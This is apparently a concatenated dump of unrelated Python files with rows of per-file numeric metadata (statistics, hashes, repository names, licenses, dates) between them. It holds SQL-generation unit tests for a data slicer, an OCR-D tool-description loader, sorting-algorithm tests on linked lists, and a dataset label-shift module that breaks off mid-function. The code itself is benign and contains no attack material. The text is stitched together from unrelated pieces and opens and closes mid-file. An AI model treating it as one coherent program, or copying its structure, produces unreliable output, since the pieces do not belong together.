self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'NULL "$d$candidate",'
'NULL "$d$candidate_display",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[1]))
def test_build_query_with_totals_on_multiple_dimensions_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp,
slicer.dimensions.candidate.rollup(),
slicer.dimensions.political_party.rollup()) \
.queries
self.assertEqual(len(queries), 3)
with self.subTest('base query is same as without references or totals'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"candidate_id" "$d$candidate",'
'"candidate_name" "$d$candidate_display",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display","$d$political_party" '
'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[0]))
with self.subTest('first totals dimension is replaced with null'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"candidate_id" "$d$candidate",'
'"candidate_name" "$d$candidate_display",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display" '
'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[1]))
with self.subTest('all totals dimension are replaced with null'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'NULL "$d$candidate",'
'NULL "$d$candidate_display",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[2]))
def test_build_query_with_totals_cat_dimension_with_references(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp,
slicer.dimensions.political_party.rollup()) \
.reference(f.DayOverDay(slicer.dimensions.timestamp)) \
.queries
self.assertEqual(len(queries), 4)
with self.subTest('base query is same as without references or totals'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$political_party" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[0]))
with self.subTest('reference query is shifted'):
self.assertEqual('SELECT '
'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes_dod" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$political_party" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[1]))
with self.subTest('base totals query is same as base query minus the totals dimension'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[2]))
with self.subTest('reference total query is shifted without the totals dimension'):
self.assertEqual('SELECT '
'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes_dod" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[3]))
def test_build_query_with_totals_cat_dimension_with_references_and_date_filters(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp) \
.dimension(slicer.dimensions.political_party.rollup()) \
.reference(f.DayOverDay(slicer.dimensions.timestamp)) \
.filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1))) \
.queries
self.assertEqual(len(queries), 4)
with self.subTest('base query is same as without references or totals'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'GROUP BY "$d$timestamp","$d$political_party" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[0]))
with self.subTest('reference query is shifted'):
self.assertEqual('SELECT '
'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes_dod" '
'FROM "politics"."politician" '
'WHERE TIMESTAMPADD(\'day\',1,"timestamp") BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'GROUP BY "$d$timestamp","$d$political_party" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[1]))
with self.subTest('base totals query is same as base query minus the totals dimension'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[2]))
with self.subTest('reference total query is shifted without the totals dimension'):
self.assertEqual('SELECT '
'TRUNC(TIMESTAMPADD(\'day\',1,"timestamp"),\'DD\') "$d$timestamp",'
'NULL "$d$political_party",'
'SUM("votes") "$m$votes_dod" '
'FROM "politics"."politician" '
'WHERE TIMESTAMPADD(\'day\',1,"timestamp") BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[3]))
def test_build_query_with_totals_dimension_and_total_filter_not_applied(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.political_party) \
.dimension(slicer.dimensions.timestamp.rollup()) \
.filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1), False)) \
.queries
self.assertEqual(len(queries), 2)
with self.subTest('base query is same as without totals'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'GROUP BY "$d$political_party","$d$timestamp" '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[0]))
with self.subTest('base totals query is same as base query minus the totals dimension without filter'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'NULL "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$political_party" '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[1]))
def test_build_query_with_totals_dimension_and_two_filters_only_one_applied(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.political_party) \
.dimension(slicer.dimensions.timestamp.rollup()) \
.filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1), False)) \
.filter(slicer.dimensions.timestamp.between(date(2018, 3, 1), date(2019, 9, 1), True)) \
.queries
self.assertEqual(len(queries), 2)
with self.subTest('base query is same as without totals with both filters'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'AND "timestamp" BETWEEN \'2018-03-01\' AND \'2019-09-01\' '
'GROUP BY "$d$political_party","$d$timestamp" '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[0]))
with self.subTest('base totals query is same as base query minus the totals dimension with one filter'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'NULL "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-03-01\' AND \'2019-09-01\' '
'GROUP BY "$d$political_party" '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[1]))
def test_build_query_with_totals_dimensions_and_filter_applied_on_correct_total_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.political_party.rollup()) \
.dimension(slicer.dimensions.timestamp.rollup()) \
.filter(slicer.dimensions.timestamp.between(date(2018, 1, 1), date(2019, 1, 1), False)) \
.queries
self.assertEqual(len(queries), 3)
with self.subTest('base query is same as without totals'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'GROUP BY "$d$political_party","$d$timestamp" '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[0]))
with self.subTest('base totals query is same as base query minus the timestamp totals dimension'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'NULL "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$political_party" '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[1]))
with self.subTest('base totals query is same as base query minus the political party totals dimension'):
self.assertEqual('SELECT '
'NULL "$d$political_party",'
'NULL "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'WHERE "timestamp" BETWEEN \'2018-01-01\' AND \'2019-01-01\' '
'ORDER BY "$d$political_party","$d$timestamp"', str(queries[2]))
| 50.900952
| 116
| 0.49826
| 2,453
| 26,723
| 5.314309
| 0.053812
| 0.095581
| 0.072492
| 0.038662
| 0.933185
| 0.930884
| 0.924977
| 0.915465
| 0.900123
| 0.883553
| 0
| 0.016718
| 0.366538
| 26,723
| 524
| 117
| 50.998092
| 0.753367
| 0.004453
| 0
| 0.829157
| 0
| 0
| 0.337243
| 0.116236
| 0
| 0
| 0
| 0
| 0.129841
| 1
| 0.047836
| false
| 0
| 0.009112
| 0
| 0.066059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cd184fbcd3012eace2dd34f722f5fe14c93926d
| 168
|
py
|
Python
|
align/ocrd_tool.py
|
kba/cis-ocrd-py
|
4b6d2a29ac82cf1ec734a87314a6c774271d09bc
|
[
"MIT"
] | 26
|
2019-10-23T22:40:17.000Z
|
2022-03-04T11:32:51.000Z
|
align/ocrd_tool.py
|
kba/cis-ocrd-py
|
4b6d2a29ac82cf1ec734a87314a6c774271d09bc
|
[
"MIT"
] | 64
|
2019-08-29T14:27:40.000Z
|
2022-03-25T15:23:21.000Z
|
align/ocrd_tool.py
|
kba/cis-ocrd-py
|
4b6d2a29ac82cf1ec734a87314a6c774271d09bc
|
[
"MIT"
] | 7
|
2019-09-23T13:32:04.000Z
|
2021-04-15T11:46:48.000Z
|
import json
from pkg_resources import resource_string
def get_ocrd_tool():
return json.loads(
resource_string(__name__, 'ocrd-tool.json').decode('utf8'))
| 21
| 67
| 0.738095
| 23
| 168
| 5
| 0.695652
| 0.243478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.154762
| 168
| 7
| 68
| 24
| 0.802817
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8cd82fc13db1d5e6801c11259b6980439d686acd
| 9,676
|
py
|
Python
|
tests/test_SortingAlgorithms.py
|
chrisphil335/structlinks
|
61aee24ec15c7caab9ce99e1f97ce30e7f21157c
|
[
"MIT"
] | 9
|
2021-04-09T21:20:46.000Z
|
2022-03-25T12:14:43.000Z
|
tests/test_SortingAlgorithms.py
|
chrisphil335/structlinks
|
61aee24ec15c7caab9ce99e1f97ce30e7f21157c
|
[
"MIT"
] | 19
|
2021-03-22T07:52:39.000Z
|
2021-04-07T20:04:05.000Z
|
tests/test_SortingAlgorithms.py
|
chrisphil335/structlinks
|
61aee24ec15c7caab9ce99e1f97ce30e7f21157c
|
[
"MIT"
] | 7
|
2021-04-10T21:08:12.000Z
|
2022-03-20T12:55:23.000Z
|
"""This file contains tests for SortingAlgorithms.py.
"""
from SortingAlgorithms import *
from LinkedList import *
from DoublyLinkedList import *
from typing import Optional, Callable
########################################
# Base tests for non-mutating sorts
########################################
class BaseNoMutatingSort:
"""The base class for a suit of tests that work with in place sorting algorithms.
Inherit from this class and assign an algorithm to be used in the tests.
"""
algorithm: Callable[[], None] = staticmethod(None)
def test_unsortedlist(self) -> None:
"""Test algorithm on an unsorted list"""
test_list = [9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200]
actual = self.algorithm(test_list)
expected = sorted(test_list)
assert actual == expected
def test_sortedlist(self) -> None:
"""Test algorithm on a sorted list"""
test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
actual = self.algorithm(test_list)
expected = sorted(test_list)
assert actual == expected
def test_reversedlist(self) -> None:
"""Test algorithm on a reversed list"""
test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
actual = self.algorithm(test_list)
expected = sorted(test_list)
assert actual == expected
def test_key_reverse(self) -> None:
"""Test algorithm on a list, sort with a reversing key."""
test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
actual = self.algorithm(test_list, (lambda x: -x))
expected = sorted(test_list, key=(lambda x: -x))
assert actual == expected
def test_unsorted_linked_list(self) -> None:
"""Test algorithm on an unsorted list"""
test_list = LinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200])
actual = self.algorithm(test_list).to_list()
expected = sorted(test_list.to_list())
assert actual == expected
def test_sorted_linked_list(self) -> None:
"""Test algorithm on a sorted list"""
test_list = LinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
actual = self.algorithm(test_list).to_list()
expected = sorted(test_list.to_list())
assert actual == expected
def test_reversed_linked_list(self) -> None:
"""Test algorithm on a reversed list"""
test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
actual = self.algorithm(test_list).to_list()
expected = sorted(test_list.to_list())
assert actual == expected
def test_key_reverse_linked_list(self) -> None:
"""Test algorithm on a list, sort with a reversing key."""
test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
actual = self.algorithm(test_list, (lambda x: -x)).to_list()
expected = sorted(test_list.to_list(), key=(lambda x: -x))
assert actual == expected
def test_unsorted_doubly_linked_list(self) -> None:
"""Test algorithm on an unsorted list"""
test_list = DoublyLinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200])
actual = self.algorithm(test_list).to_list()
expected = sorted(test_list.to_list())
assert actual == expected
def test_sorted_doubly_linked_list(self) -> None:
"""Test algorithm on a sorted list"""
test_list = DoublyLinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
actual = self.algorithm(test_list).to_list()
expected = sorted(test_list.to_list())
assert actual == expected
def test_reversed_doubly_linked_list(self) -> None:
"""Test algorithm on a reversed list"""
test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
actual = self.algorithm(test_list).to_list()
expected = sorted(test_list.to_list())
assert actual == expected
def test_key_reverse_doubly_linked_list(self) -> None:
"""Test algorithm on a list, sort with a reversing key."""
test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
actual = self.algorithm(test_list, (lambda x: -x)).to_list()
expected = sorted(test_list.to_list(), key=(lambda x: -x))
assert actual == expected
########################################
# Base tests for mutating sorts
########################################
class BaseInPlaceSort:
"""The base class for a suit of tests that work with in place sorting algorithms.
Inherit from this class and assign an algorithm to be used in the tests.
"""
algorithm: Callable[[], None] = staticmethod(None)
def test_unsortedlist(self) -> None:
"""Test algorithm on an unsorted list"""
test_list = [9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200]
expected = sorted(test_list.copy())
self.algorithm(test_list)
actual = test_list.copy()
assert actual == expected
def test_sortedlist(self) -> None:
"""Test algorithm on an sorted list"""
test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
expected = sorted(test_list.copy())
self.algorithm(test_list)
actual = test_list.copy()
assert actual == expected
def test_reversedlist(self) -> None:
"""Test algorithm on a reversed list"""
test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
expected = sorted(test_list.copy())
self.algorithm(test_list)
actual = test_list.copy()
assert actual == expected
def test_key_reverse(self) -> None:
"""Test algorithm on a list, sort with a reversing key."""
test_list = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
self.algorithm(test_list, (lambda x: -x))
actual = test_list.copy()
expected = sorted(test_list.copy(), key=(lambda x: -x))
assert actual == expected
def test_unsorted_linked_list(self) -> None:
"""Test algorithm on an unsorted list"""
test_list = LinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200])
expected = sorted(test_list.to_list())
self.algorithm(test_list)
actual = test_list.to_list()
assert actual == expected
def test_sorted_linked_list(self) -> None:
"""Test algorithm on an sorted list"""
test_list = LinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
expected = sorted(test_list.to_list())
self.algorithm(test_list)
actual = test_list.to_list()
assert actual == expected
def test_reversed_linked_list(self) -> None:
"""Test algorithm on a reversed list"""
test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
expected = sorted(test_list.to_list())
self.algorithm(test_list)
actual = test_list.to_list()
assert actual == expected
def test_key_reverse_linked_list(self) -> None:
"""Test algorithm on a list, sort with a reversing key."""
test_list = LinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
self.algorithm(test_list, (lambda x: -x))
actual = test_list.to_list()
expected = sorted(test_list.to_list(), key=(lambda x: -x))
assert actual == expected
def test_unsorted_doubly_linked_list(self) -> None:
"""Test algorithm on an unsorted list"""
test_list = DoublyLinkedList([9, 7, 5, 2, 4, 5, 3, 3, 2, 1, 10, 200])
expected = sorted(test_list.to_list())
self.algorithm(test_list)
actual = test_list.to_list()
assert actual == expected
def test_sorted_doubly_linked_list(self) -> None:
"""Test algorithm on an sorted list"""
test_list = DoublyLinkedList([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
expected = sorted(test_list.to_list())
self.algorithm(test_list)
actual = test_list.to_list()
assert actual == expected
def test_reversed_doubly_linked_list(self) -> None:
"""Test algorithm on a reversed list"""
test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
expected = sorted(test_list.to_list())
self.algorithm(test_list)
actual = test_list.to_list()
assert actual == expected
def test_key_reverse_doubly_linked_list(self) -> None:
"""Test algorithm on a list, sort with a reversing key."""
test_list = DoublyLinkedList([10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0])
self.algorithm(test_list, (lambda x: -x))
actual = test_list.to_list()
expected = sorted(test_list.to_list(), key=(lambda x: -x))
assert actual == expected
class TestNoMutatingMergesort(BaseNoMutatingSort):
"""Test the non-mutating mergesort algorithm"""
algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(no_mut_mergesort)
class TestInPlaceMergesort(BaseInPlaceSort):
"""Test the mutating mergesort algorithm"""
algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(mergesort)
class TestInPlaceQuicksort(BaseInPlaceSort):
"""Test the mutating quicksort algorithm"""
algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(quicksort)
class TestNoMutatingQuicksort(BaseNoMutatingSort):
"""Test the non-mutating quicksort algorithm"""
algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(no_mut_quicksort)
class TestInPlaceInsertionSort(BaseInPlaceSort):
"""Test the mutating insertionsort algorithm"""
algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(insertion_sort)
class TestInPlaceSelectionSort(BaseInPlaceSort):
"""Test the mutating selection sort algorithm"""
algorithm: Optional[tuple[Callable[[list], None]]] = staticmethod(selection_sort)
| 33.597222
| 87
| 0.612133
| 1,303
| 9,676
| 4.398312
| 0.069839
| 0.117257
| 0.052347
| 0.073286
| 0.891467
| 0.877159
| 0.877159
| 0.877159
| 0.85657
| 0.85657
| 0
| 0.041941
| 0.245969
| 9,676
| 287
| 88
| 33.714286
| 0.743558
| 0.164634
| 0
| 0.861842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.157895
| false
| 0
| 0.026316
| 0
| 0.289474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50a18c1f61487090a47f0df4b5ee4aeeaaabd106
| 16,797
|
py
|
Python
|
alsa/datasets/shift_transforms.py
|
QasimWani/alls
|
13c44ea8f0f4ee7b5bae419813713742a03a5742
|
[
"Unlicense",
"MIT"
] | 2
|
2021-08-10T20:20:38.000Z
|
2021-09-01T14:40:19.000Z
|
alsa/datasets/shift_transforms.py
|
QasimWani/alls
|
13c44ea8f0f4ee7b5bae419813713742a03a5742
|
[
"Unlicense",
"MIT"
] | 2
|
2021-05-03T09:53:05.000Z
|
2021-08-20T00:36:23.000Z
|
alsa/datasets/shift_transforms.py
|
QasimWani/alls
|
13c44ea8f0f4ee7b5bae419813713742a03a5742
|
[
"Unlicense",
"MIT"
] | 2
|
2021-12-14T02:16:27.000Z
|
2022-01-25T23:08:49.000Z
|
"""Resources for shifting datasets."""
import random
import math
import numpy as np
def uniform_dataset(idxs_by_label, size, replace=True, verbose=True):
"""Uniformly distribute dataset."""
# Group data points by label
if replace:
# Sample size points from each
cls_size = math.ceil(size / len(idxs_by_label))
for l in idxs_by_label:
if idxs_by_label[l]:
idxs = np.random.randint(0,
len(idxs_by_label[l]),
size=(cls_size, ))
idxs_by_label[l] = [idxs_by_label[l][i] for i in idxs]
else:
# How many data points should we keep in classes?
cls_size = min([len(v) for v in idxs_by_label.values()])
# Handle excess points
if cls_size * len(idxs_by_label) > size:
cls_size = math.ceil(size / len(idxs_by_label))
# Cut classes data points
for l in idxs_by_label:
idxs_by_label[l] = idxs_by_label[l][:cls_size]
cls_composition = [
len(idxs_by_label[k]) for k in sorted(idxs_by_label.keys())
]
cls_composition = np.array(cls_composition, dtype=np.float32)
if verbose:
print("Class composition: ", cls_composition)
# Build new dataset
dataset = []
for v in idxs_by_label.values():
dataset += v
random.shuffle(dataset)
if verbose:
print("Full dataset size: ", len(dataset))
return dataset
def tweak_dataset(idxs_by_label, size, args, replace=True, verbose=True):
"""Adjust the likelihood of one specific class"""
if replace:
# Compute tweak size
tweak_size = math.ceil(args.tweak_prop * size)
other_size = math.ceil(size * (1 - args.tweak_prop) /
(len(idxs_by_label) - 1))
# Cut classes data points
for l in idxs_by_label:
if idxs_by_label[l]:
if l == args.tweak_label:
idxs = np.random.randint(0,
len(idxs_by_label[l]),
size=(tweak_size, ))
else:
idxs = np.random.randint(0,
len(idxs_by_label[l]),
size=(other_size, ))
idxs_by_label[l] = [idxs_by_label[l][i] for i in idxs]
else:
# How many data points should we keep in classes?
new_size = len(idxs_by_label[args.tweak_label]) / args.tweak_prop
if new_size > size:
new_size = size
other_size = math.ceil(new_size * (1 - args.tweak_prop) /
(len(idxs_by_label) - 1))
# Cut classes data points
for l in idxs_by_label:
if l != args.tweak_label:
idxs_by_label[l] = idxs_by_label[l][:other_size + 1]
cls_composition = [
len(idxs_by_label[k]) for k in sorted(idxs_by_label.keys())
]
cls_composition = np.array(cls_composition, dtype=np.float32)
if verbose:
print("Class composition: ", cls_composition)
# Build new dataset
dataset = []
for v in idxs_by_label.values():
dataset += v
random.shuffle(dataset)
if verbose:
print("Full dataset size: ", len(dataset))
return dataset
def dirichlet_dataset(idxs_by_label,
size,
args,
replace=True,
verbose=True,
distribution=None):
"""Shift dataset with prior sampled from Dirichlet distribution."""
# Compute distribution if not provided
if distribution is None:
distribution = np.random.dirichlet([args.dirichlet_alpha] *
len(idxs_by_label),
size=())
# Group data points by label
if replace:
for l in idxs_by_label:
cls_size = math.ceil(size * distribution[l])
if not cls_size:
cls_size = 1
if idxs_by_label[l]:
idxs = np.random.randint(0,
len(idxs_by_label[l]),
size=(cls_size, ))
idxs_by_label[l] = [idxs_by_label[l][i] for i in idxs]
else:
# Find resulting dataset size
dataset_sizes = []
for l in idxs_by_label.items():
dataset_sizes.append(len(idxs_by_label[l]) / distribution[l])
new_size = min(dataset_sizes)
# Handle excess points
if new_size > size:
new_size = size
# Cut classes data points
for l in idxs_by_label:
cls_size = math.ceil(new_size * distribution[l])
if not cls_size:
cls_size = 1
idxs_by_label[l] = idxs_by_label[l][:cls_size]
cls_composition = [
len(idxs_by_label[k]) for k in sorted(idxs_by_label.keys())
]
cls_composition = np.array(cls_composition, dtype=np.float32)
if verbose:
print("Class composition: ", cls_composition)
# Build new dataset
dataset = []
for v in idxs_by_label.values():
dataset += v
random.shuffle(dataset)
if verbose:
print("Full dataset size: ", len(dataset))
return dataset, distribution
def shift_dataset(args, warmstart_idxs_by_label, online_idxs_by_label,
test_idxs_by_label):
"""Shift source and target according to arg rules."""
# Transform datasets
warmstart_size = int(args.dataset_cap * (args.warmstart_ratio /
(args.warmstart_ratio + 1)))
online_size = args.dataset_cap - warmstart_size
test_size = online_size
if args.dataset == "nabirds":
test_size = 5000
# test_size = sum([len(x) for x in test_idxs_by_label.values()])
if args.shift_strategy == "dirichlet":
# Dirichlet source, uniform target/test
warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
online_idxs = uniform_dataset(online_idxs_by_label, online_size)
test_idxs = uniform_dataset(test_idxs_by_label, test_size)
elif args.shift_strategy == "tweak":
# Tweak source, uniform target/test
warmstart_idxs = tweak_dataset(warmstart_idxs_by_label, warmstart_size,
args)
online_idxs = uniform_dataset(online_idxs_by_label, online_size)
test_idxs = uniform_dataset(test_idxs_by_label, test_size)
elif args.shift_strategy == "trulynone":
warmstart_idxs = np.concatenate(list(warmstart_idxs_by_label.values()))
np.random.shuffle(warmstart_idxs)
warmstart_idxs = warmstart_idxs[:warmstart_size]
online_idxs = np.concatenate(list(online_idxs_by_label.values()))
np.random.shuffle(online_idxs)
online_idxs = online_idxs[:online_size]
print("warmstart", [len(x) for x in warmstart_idxs_by_label.values()])
print("online", [len(x) for x in online_idxs_by_label.values()])
test_idxs = uniform_dataset(test_idxs_by_label, test_size)
elif args.shift_strategy == "trulyregion":
warmstart_idxs = np.concatenate(list(warmstart_idxs_by_label.values()))
np.random.shuffle(warmstart_idxs)
warmstart_idxs = warmstart_idxs[:warmstart_size]
print("warmstart", [len(x) for x in warmstart_idxs_by_label.values()])
online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size,
args)
test_idxs, p = dirichlet_dataset(test_idxs_by_label,
test_size,
args,
distribution=p)
elif args.shift_strategy == "none":
# Uniform source, uniform target/test
warmstart_idxs = uniform_dataset(warmstart_idxs_by_label,
warmstart_size)
online_idxs = uniform_dataset(online_idxs_by_label, online_size)
test_idxs = uniform_dataset(test_idxs_by_label, test_size)
elif args.shift_strategy == "dirichlet_target":
# Uniform source, dirichlet target/test
warmstart_idxs = uniform_dataset(warmstart_idxs_by_label,
warmstart_size)
online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size,
args)
test_idxs, p = dirichlet_dataset(test_idxs_by_label,
test_size,
args,
distribution=p)
elif args.shift_strategy == "dirichlet_online_target":
# Uniform source, dirichlet target/test
warmstart_idxs = uniform_dataset(warmstart_idxs_by_label,
warmstart_size)
online_idxs = uniform_dataset(online_idxs_by_label, online_size)
test_idxs, p = dirichlet_dataset(test_idxs_by_label, test_size, args)
elif args.shift_strategy == "dirichlet_identical":
# Dirichlet source, dirichlet target/test (identical p)
warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
online_idxs, p = dirichlet_dataset(online_idxs_by_label,
online_size,
args,
distribution=p)
test_idxs, p = dirichlet_dataset(test_idxs_by_label,
test_size,
args,
distribution=p)
elif args.shift_strategy == "dirichlet_mix":
# Dirichlet source, dirichlet target/test (different p)
warmstart_idxs, _ = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
online_idxs, p = dirichlet_dataset(online_idxs_by_label, online_size,
args)
test_idxs, p = dirichlet_dataset(test_idxs_by_label,
test_size,
args,
distribution=p)
elif args.shift_strategy == "dirichlet_online":
# Dirichlet source, dirichlet target/test (different p)
warmstart_idxs, p = dirichlet_dataset(warmstart_idxs_by_label,
warmstart_size, args)
online_idxs, _ = dirichlet_dataset(online_idxs_by_label, online_size,
args)
